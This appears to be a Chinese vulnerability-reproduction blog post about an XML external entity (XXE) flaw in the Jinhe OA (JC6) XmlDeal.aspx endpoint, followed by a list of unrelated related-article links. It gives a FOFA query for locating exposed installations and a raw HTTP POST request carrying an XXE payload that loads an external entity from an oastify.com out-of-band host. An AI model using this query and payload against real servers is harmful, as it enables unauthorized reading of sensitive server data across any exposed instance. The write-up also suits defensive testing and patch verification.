当前位置: 首页 > news >正文

【漏洞复现】金和OA XmlDeal.aspx XXE漏洞

news 2025/9/12 6:13:03

0x01 产品简介

金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。

0x02 漏洞概述

金和OA-C6-XmlDeal.aspx接口存在XML实体注入漏洞,未授权的攻击者可通过该漏洞获取服务器敏感数据。

0x03 测绘语句

fofa: app="金和网络-金和OA"

0x04 漏洞复现

​
使用burp自带的dnslogPOST /c6/JHSoft.Web.Message/XmlDeal.aspx HTTP/1.1Host:Content-Type: application/Xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://zdgenbqwmvts71ozygb7fowluc03otci.oastify.com/"> %remote;]>'​

http://www.lryc.cn/news/329963.html

相关文章:

  • 对比:React 还是 Vue
  • ubuntu 20.04 SD 卡分区类型 msdos 改为 GPT 的方法
  • Kubernetes(K8s)技术解析
  • Python 基于 OpenCV 视觉图像处理实战 之 OpenCV 简单实战案例 之十 简单颜色反转效果
  • 【ELK+Kafka+filebeat分布式日志收集】部署filebeat和Kibana(三)
  • 二.音视频编辑-媒体组合-播放
  • 前端安全-面试题(2024)
  • CVE-2022-29405 Apache Archiva任意用户密码重置漏洞分析
  • ssm框架配置文件例子
  • maven构建项目报错:Failure to find com.microsoft.sqlserver:sqljdbc4:jar:4.0 in
  • 已解决rabbitmq AMQPConnectionClosedException:管道破裂或连接关闭异常的正确解决方法,亲测有效!!!
  • Excel 隔几行批量插入空白行
  • 2024年04月在线IDE流行度最新排名
  • 如何通过Elasticsearch实现搜索的关键词达到高亮的效果
  • 真实sql注入以及小xss--BurpSuite联动sqlmap篇
  • Java类和对象练习题
  • Qt 实现简易的视频播放器,功能选择视频,播放,暂停,前进,后退,进度条拖拉,视频时长显示
  • vue基础教程(6)——构建项目级登录页
  • C++宝强越狱1.0.6版本
  • 构建高可用性数据库架构:深入探索Oracle Active Data Guard(ADG)
  • 记录-rosbag的处理
  • 用Wireshark解码H.264
  • Flink中几个关键问题总结
  • 华为配置ARP安全综合功能实验
  • new mars3d.layer.XyzLayer({的rectangle瓦片数据的矩形区域范围说明
  • 数据分析之Tebleau可视化:折线图、饼图、环形图
  • 【Frida】【Android】 07_爬虫之网络通信库HttpURLConnection
  • 算法2.6基数排序
  • redis -List
  • ARMv8-A架构下的外部debug模型(external debug)简介